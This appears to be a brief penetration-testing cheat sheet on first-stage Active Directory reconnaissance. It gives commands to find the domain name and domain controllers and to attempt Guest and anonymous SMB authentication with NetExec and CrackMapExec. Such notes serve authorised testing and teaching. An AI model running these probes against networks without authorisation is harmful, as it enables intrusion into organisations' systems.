Active Directory First Lookup

Table of contents

1. Prerequisites
2. Exploit

---

Prerequisites

• Network route to at least one domain controller.

Exploit

First, let’s identify domain controllers of the Active Directory domain you are targeting.

# Get domain name.
nmcli dev show $Interface | grep -i "domain"

# Get domain controllers IPs.
nslookup $DomainName

Now, using NetExec, try to authenticate as anonymous and Guest.

# Get domain controllers system info.
nxc smb $DomainControllersIPs

# Authenticate as Guest and anonymous.
cme smb $DomainControllerIP -d $DomainName -u 'Guest' -p ''
cme smb $DomainControllerIP -d $DomainName -u 'Guest' -p '' --local-auth
cme smb $DomainControllerIP -d $DomainName -u '' -p ''
cme smb $DomainControllerIP -d $DomainName -u '' -p '' --local-auth